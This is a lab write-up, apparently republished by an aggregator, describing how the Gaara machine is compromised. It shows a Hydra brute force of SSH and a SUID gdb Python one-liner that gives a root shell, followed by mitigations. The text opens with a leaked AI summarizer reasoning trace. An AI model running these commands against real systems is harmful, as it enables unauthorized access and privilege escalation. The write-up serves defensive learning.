Gaara — SSH Brute Force + SUID gdb Shell Escape | OffSec PG Play
嗯,用户让我帮忙总结一篇文章的内容,控制在100字以内,而且不需要用“文章内容总结”之类的开头。直接写描述就行。好的,我先看看这篇文章讲的是什么。 这篇文章是关于一个叫做Gaara的盒子的渗透测试过程。首先,文章提到Gaara暴露了SSH和HTTP端口,但HTTP服务器上没什么有用的东西,只有一个图片。攻击者通过SSH暴力破解,使用rockyou.txt字典找到了gaara用户的密码。进入系统后,扫描SUID权限的二进制文件发现了gdb,并且gdb有SUID root权限。利用gdb的一个Python脚本,攻击者成功获得了root权限。 总结一下,整个攻击过程分为几个步骤:侦察、初始访问(SSH暴力破解)、权限提升(利用gdb的SUID漏洞)、证明妥协、漏洞总结以及防御和缓解措施。主要的问题有两个:弱密码和gdb的SUID配置错误。 用户的要求是控制在100字以内,并且直接描述内容。所以我要把关键点提炼出来:SSH暴力破解、gdb的SUID漏洞、获得root权限。 可能还需要注意不要遗漏重要信息,比如攻击路径和关键点。同时要确保语言简洁明了。 现在试着组织一下语言:Gaara是一个盒子,通过SSH暴力破解进入系统后,利用gdb的SUID漏洞获取root权限。 这样大概在20字左右,可能太短了。再扩展一点:通过SSH暴力破解进入系统后,利用gdb的SUID漏洞获取root权限。 或者更详细一点:Gaara盒子通过SSH暴力破解进入系统后,利用gdb的SUID漏洞获取root权限。 嗯,这样应该可以满足要求了。 </think> Gaara是一个通过SSH暴力破解进入系统的盒子,在发现gdb具有SUID root权限后,利用其Python功能获取了root权限。 2026-4-3 06:0:21 Author: infosecwriteups.com(查看原文) 阅读量:6 收藏

Gaara is a box that starts simply and ends the same way. There is only SSH and HTTP exposed, and the web server has nothing useful on it — just a single image. The way in is a brute force on SSH using rockyou.txt, which pops the gaara user in a reasonable time. Once inside, a SUID scan turns up something that does not belong: gdb. The GNU debugger with a SUID root bit set is an immediate game over. One GDB Python one-liner later, and the effective UID flips to root. Nothing exotic, just a weak password and a dangerous misconfiguration sitting right out in the open.

Roshan Rajbanshi

Attack Path: SSH brute force (gaara)SUID gdb GTFObins (root)

Press enter or click to view image in full size

Platform: OffSec Proving Grounds Play
Machine: Gaara
Difficulty: Easy
OS: Linux (Debian)
Date: 2026–03–24

Table of Contents

1. Reconnaissance
   1.1  Nmap Port Scan
   1.2  Web Enumeration
2. Initial Access — SSH Brute Force
3. Privilege Escalation — SUID gdb (GTFObins)
4. Proof of Compromise
5. Vulnerability Summary
6. Defense & Mitigation
   6.1  Weak SSH Password
   6.2  SUID Bit on gdb

1. Reconnaissance

1.1 Nmap Port Scan

nmap -Pn -A -p- --open <TARGET_IP>

Results:

Port    State  Service  Version
------  -----  -------  -----------------------------------
22/tcp  open   SSH      OpenSSH 7.9p1 Debian 10+deb10u2
80/tcp  open   HTTP     Apache httpd 2.4.38 (Debian)

Two ports. The HTTP title came back as “Gaara” — clearly a themed box. Nothing else stood out from the scan. With a minimal surface like this, the web server was worth a quick look before moving to more aggressive approaches.

1.2 Web Enumeration

curl http://<TARGET_IP>

Output:

<html>
    <title>Gaara</title>
    <img src="gaara.jpg" alt="wallpaper" width="100%" height="100%">
</html>

That is the entire page. A single image, no links, no forms, no parameters, no hidden paths worth pursuing. Directory enumeration found nothing interesting either. The web server is a dead end. The only real attack surface here is SSH, and with a known username from the machine’s theme — gaara — brute force is the logical next step.

2. Initial Access — SSH Brute Force

With no other way in, Hydra was pointed at SSH using gaara as the username and rockyou.txt as the wordlist:

hydra -l gaara -P /usr/share/wordlists/rockyou.txt ssh://<TARGET_IP> -t 4

Result:

[22][ssh] host: <TARGET_IP>   login: gaara   password: <redacted>
1 of 1 target successfully completed, 1 valid password found

Password found: <redacted>. Logged in over SSH:

ssh gaara@<TARGET_IP>
# Password: <redacted>

Shell obtained as gaara.

3. Privilege Escalation — SUID gdb (GTFObins)

First check after landing — SUID binaries:

find / -perm -u=s -type f 2>/dev/null

Output (notable entries):

/usr/bin/gdb
/usr/bin/sudo
/usr/bin/su
/usr/bin/passwd
...

/usr/bin/gdb with the SUID bit set. GDB — the GNU Debugger — has no business being SUID root. This is a well-known GTFObins entry: GDB can execute arbitrary Python code at startup, and since it is running with root's effective UID, any shell spawned inherits that privilege.

gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

Output:

GNU gdb (Debian 8.2.1-2+b3) 8.2.1
...
# id
uid=1001(gaara) gid=1001(gaara) euid=0(root) egid=0(root) groups=0(root),1001(gaara)

euid=0 — root's effective UID. The -p flag on sh preserves the elevated effective UID rather than dropping it. Root shell obtained.

Press enter or click to view image in full size

4. Proof of Compromise

# id
uid=1001(gaara) gid=1001(gaara) euid=0(root) egid=0(root) groups=0(root),1001(gaara)

5. Vulnerability Summary

#   Vulnerability              Severity  Impact
--  -------------------------  --------  -----------------------------------------------
1   Weak SSH password          High      SSH brute force gives initial user access
2   SUID bit set on /usr/bin/gdb  High   Local privilege escalation to root via GTFObins

6. Defense & Mitigation

6.1 Weak SSH Password

Root Cause: The gaara account was protected by a password that appeared in the rockyou.txt wordlist — one of the most commonly used password lists in existence. Any attacker with network access to port 22 and a username could have found it.

Get Roshan Rajbanshi’s stories in your inbox

Join Medium for free to get updates from this writer.

Remember me for faster sign in

Mitigations:

  • Disable SSH password authentication entirely. Set PasswordAuthentication no in /etc/ssh/sshd_config and use key-based authentication only. This eliminates brute force attacks against SSH.
  • Enforce strong password policies. If passwords are required, use pam_pwquality a policy to mandate minimum length and complexity. A password like iloveyou2 this would fail any reasonable policy.
  • Implement login rate limiting. Tools like fail2ban can detect and block IPs that are generating repeated failed SSH login attempts, slowing down or stopping brute force attacks. Configure it to ban after a small number of failures with an exponential backoff.
  • Change the SSH port. Moving SSH off port 22 does not stop a determined attacker, but it eliminates the vast majority of automated scanning noise and reduces exposure significantly.
  • Restrict SSH access by IP. If the set of machines that need SSH access is known, use AllowUsers directives or firewall rules to restrict which IPs can even reach port 22.

6.2 SUID Bit on gdb

Root Cause: The SUID bit was set on /usr/bin/gdb, meaning any user who executed it would do so with root's effective UID. GDB is a debugger with rich scripting capabilities — it can execute Python, run shell commands, and call arbitrary system functions. SUID on a tool this powerful is equivalent to giving every user passwordless root access.

Mitigations:

  • Remove the SUID bit immediately. chmod u-s /usr/bin/gdb — There is no legitimate operational reason for a debugger to run as root via SUID. If root-level debugging is needed, it should be done through sudo with explicit logging and a specific user allowlist.
  • Audit all SUID binaries regularly. Run find / -perm -u=s -type f 2>/dev/null as part of any system hardening process or scheduled security audit. Anything on that list that is not a standard system utility should be investigated immediately.
  • Check GTFObins before granting elevated permissions. GTFObins documents dozens of binaries that can be abused when run with elevated privileges. Before setting SUID on any binary, or allowing it via sudo, check if it appears there. GDB is listed explicitly.
  • Use AppArmor or SELinux profiles. Mandatory access control frameworks can restrict what a SUID binary can actually do, even if the bit is mistakenly set, limiting the blast radius of a misconfiguration like this.
  • Principle of least privilege. Developers and users who need gdb for debugging should not require root — they should be debugging their own processes. If kernel or system-level debugging is genuinely needed, structure access should be through controlled mechanisms rather than a blanket SUID flag.

OffSec PG Play — for educational purposes only.


文章来源: https://infosecwriteups.com/gaara-ssh-brute-force-suid-gdb-shell-escape-offsec-pg-play-c760afb66e6d?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh